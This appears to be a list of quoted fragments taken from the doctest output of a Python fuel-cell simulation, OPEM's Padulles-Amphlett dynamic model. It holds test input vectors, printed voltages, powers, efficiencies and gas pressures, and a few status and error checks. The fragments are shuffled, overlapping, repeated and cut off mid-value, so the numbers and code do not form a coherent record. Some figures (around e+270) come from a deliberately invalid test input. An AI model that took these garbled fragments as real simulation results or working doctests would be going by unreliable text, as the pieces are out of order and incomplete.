0.24237187664677873 atm PO2 : 0.19048357755072845 atm", ": 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I", "Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564", "0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss :", "V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V Eta Ohmic", "to minus amount of V, please check your inputs Done! >>> shutil.rmtree(\"Padulles-Amphlett\") '''", "V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency", "W ########### I : 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398", "Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2", "Efficiency : 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V", ": 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I", "E : 6.068389351849069 V Eta Activation : 0.3769483587657406 V Eta Concentration : 0.0003547094700620668", "Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic :", "FC Efficiency : 0.50107358791043 FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544", "Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell", "V Eta Activation : 0.38052969267197334 V Eta Concentration : 0.0003746674093630815 V Eta Ohmic", "6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta", "Loss=0.4, N=None) [Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> 
Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector,", "Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427", "Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2", "Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819 V", "W ########### I : 3.1 E : 6.068369344266841 V Eta Activation : 0.4129629601316751", "FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484", "I : 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta", "PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal", "V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power :", ": 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 :", "W ########### I : 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836", "Efficiency : 0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V", "0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm Power-Thermal : 5.7435444057448075", "Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V Eta Ohmic :", "4.022761331205627 V Loss : 0.40912283407888206 V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034", "0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power", "V Loss : 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm", ": 0.005672855976278701 V FC Efficiency : 0.507882865258588 FC 
Power : 12.676756316854359 W FC", "6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta", ": 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O :", ": 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V Eta Activation", "0.5271753860695316 FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss :", "Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O", "0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I :", "5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 :", ": 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V", "atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3", "FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage : 3.950291009654725", "FC Power : 8.635132823818928 W FC Voltage : 4.111968011342347 V Loss : 0.3912833448667819", ": 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC", ": 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I", "PH2 : 0.19684758355567097 atm PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal", ": 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC", "0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is", "0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration :", ": 3.5712130804699886 W ########### I : 1.9 E : 6.068387813188879 V Eta Activation", ": 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC", ": 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration : 
0.0007181421727400468 V", "FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage : 3.9730043399134525", "0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271", ": 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 :", "W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239", ": 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O :", "W ########### I : 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906", "V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency", "V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic", "0.4213762911512418 V PH2 : 0.19673518050275585 atm PH2O : 0.24214705990750765 atm PO2 : 0.19038045065415046", "V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta Ohmic", "V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm", "3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204", "FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2 : 0.19681948279244216 atm", "Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728", "FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285", "Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency :", "0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I :", "0.5174690806642298 FC Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss :", "Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic :", "import * >>> import shutil >>> 
Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation", "0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W FC Voltage", ": 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V Eta Ohmic : 0.006210893371826288 V", "W ########### I : 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729", ": 4.63717533307516e+269 V FC Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC", "FC Voltage : -9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm", "########### I : 3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V", "4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498", "PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal", ": 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O :", "0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss :", "V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta Ohmic", "Power-Thermal : 5.004572056867657 W ########### I : 2.5 E : 6.068378579881878 V Eta", ": 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O :", "0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302", ">>> Padulles_Amphlett_Data[\"K\"] 
-0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4,", "V PH2 : 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm", "Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency :", "V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic", ": 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V", "Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617", "V Eta Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power :", "Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC Efficiency :", "I : 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta", ": 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391 W ########### I", "0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W ########### I : 2.0 E : 6.0683862744646095", "Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic :", "Calculation Error (Enernst:4.5, Loss:0.4, N:None) >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":2,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":5,\"i-stop\":0.1,\"i-step\":-2,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation", "V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency", "Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735", 
": 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354 FC", "I : 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V Eta", ". . I : 0.1 E : 6.14455344314445 V Eta Activation : 0.9092187394310518", ">>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None) [Error] Vcell Calculation Error", "0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 : 0.19049151038892673", "Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664", "from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ###########", "Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V", "V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power :", "V PH2 : 0.19680543241082776 atm PH2O : 0.24223352788415034 atm PO2 : 0.190420114845142 atm", "V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC Voltage :", ": 12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2", ": 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal :", "PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ###########", ": 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration", "atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal : 3.8055158202626993 W", ": 0.55589469312397 FC Power : 4.769576467003663 W 
FC Voltage : 4.335978606366966 V Loss", "V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm", "Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V", ": 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I", ": 0.0054937518419525275 V FC Efficiency : 0.5093595307581349 FC Power : 12.316313453731704 W FC", ": 0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I", "-9.392926250276482e+271 V Loss : 1.8785852500552963e+271 V PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932", "E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498", "atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W", ": 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V", "W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954", "V Eta Concentration : 0.0005353086845364485 V Eta Ohmic : 0.004778536276705824 V FC Efficiency", ": 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V", "FC Power : 9.010249888496427 W FC Voltage : 4.095568131134739 V Loss : 0.39456301313781456", "Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency :", "FC Power : 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206", "V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm", "V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage :", ": 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC", "2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration :", ": 0.24211247271685057 atm PO2 : 0.19036458497775385 atm 
Power-Thermal : 7.516043371344917 W ########### I", "Eta Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243", ": 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E :", "V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O : 0.2421297663121791 atm", "V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm", "Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O", "V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm", "Concentration : 0.0006569460115677318 V Eta Ohmic : 0.005852080755831333 V FC Efficiency : 0.5064475653403494", "atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6", "Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage : 3.9287927116842014 V", "... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5]", "4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998", "6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta", "Loss : 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2", ": 0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 :", "PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm Power-Thermal", ": 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal :", "E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493", ": 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 :", "Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V 
PH2 : 0.19673518050275585 atm PH2O", ": 0.1969178354637429 atm PH2O : 0.24237187664677873 atm PO2 : 0.19048357755072845 atm Power-Thermal :", ": 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration", ". I : 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V", "0.24238917024210727 atm PO2 : 0.19049151038892673 atm Power-Thermal : 3.5712130804699886 W ########### I :", "atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9", ": 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V", ": 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O :", "0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss :", "0.24211247271685057 atm PO2 : 0.19036458497775385 atm Power-Thermal : 7.516043371344917 W ########### I :", ": 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V", "PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ###########", "V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm", "Voltage : 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O", "Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O", "W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557", ": 0.2421643535028362 atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I", "########### I : 2.4 E : 6.068380118926627 V Eta Activation : 0.3960054536369255 V", "PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ###########", "V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power :", ": 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V Eta Concentration", 
"0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 : 0.1904280476833403", "FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 : 0.1966930293579127 atm", "12.316313453731704 W FC Voltage : 3.9730043399134525 V Loss : 0.4190730008706778 V PH2 :", "Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V", "leads to minus amount of V, please check your inputs Done! >>> shutil.rmtree(\"Padulles-Amphlett\")", "FC Power : 14.460983747095012 W FC Voltage : 3.9083739857013544 V Loss : 0.4319972241282524", ": 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration", "V Loss : 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm", "V PH2 : 0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm", "2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V Eta Activation :", "atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W", "I : 1.9 E : 6.068387813188879 V Eta Activation : 0.38052969267197334 V Eta", "PH2O : 0.242285408670136 atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ###########", "Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic :", "6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 :", ": 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V Eta Activation", "I : 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta", "0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542 W FC Voltage", "Power : 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V", "Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615", ": 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm 
Power-Thermal :", "11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2 :", ": 0.1966789789762983 atm PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal :", ": 7.116048662715165 W FC Voltage : 4.185910978067744 V Loss : 0.3764959824754877 V PH2", "0.196777331647599 atm PH2O : 0.24219894069349326 atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814", "V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency", "Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2", "6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta", ": 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4 E :", "2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration :", "Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497", "Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753", "3.5 E : 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration :", "Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5]", "Eta Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581", "6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta", "V Eta Ohmic : 0.004957160562216277 V FC Efficiency : 0.5140663396997094 FC Power :", "Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816", ": 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V Eta Activation", "Eta Activation : 0.18557231242539243 V 
Eta Concentration : 1.948431634418616e-05 V Eta Ohmic :", "FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm", "0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC Voltage", "PO2 : 0.19039631633054707 atm Power-Thermal : 6.49540141236458 W ########### I : 3.1 E", "Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2", "Power-Thermal : 8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V Eta", "3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration :", ": 0.40621862980268425 V Eta Concentration : 0.000555512176140013 V Eta Ohmic : 0.004957160562216277 V", "PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ###########", "Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W", "Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W", "0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage : 4.147096936703843 V Loss :", "7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power", "atm Power-Thermal : 7.516043371344917 W ########### I : 3.5 E : 6.068363185907339 V", "Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515", "V Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic", "PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ###########", "atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E : 6.144553093215826 V", "Ohmic : 0.004065229504538212 V FC Efficiency : 0.5230579622427114 FC Power : 9.383659842634243 W", ": 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm PH2O :", "V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 
0.5023661507925354 FC Power :", "FC Voltage : 4.147096936703843 V Loss : 0.38425817529700723 V PH2 : 0.1969178354637429 atm", "0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996", "Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V", ": 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC", ": 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E :", "0.42791409484462756 V PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555", "Power : 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V", "V Eta Ohmic : 0.00657019196303564 V FC Efficiency : 0.50107358791043 FC Power :", ": 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC", "W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996", ": -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss", "Eta Concentration : 2.301179808139826e-06 V Eta Ohmic : 9.331810347802308e+270 V FC Efficiency :", ": 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V", "Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency :", "Eta Concentration : 0.0003547094700620668 V Eta Ohmic : 0.003176255519565377 V FC Efficiency :", "V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency", ": 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I", "8.818208962422144 W ########### Report is generating ... Done! 
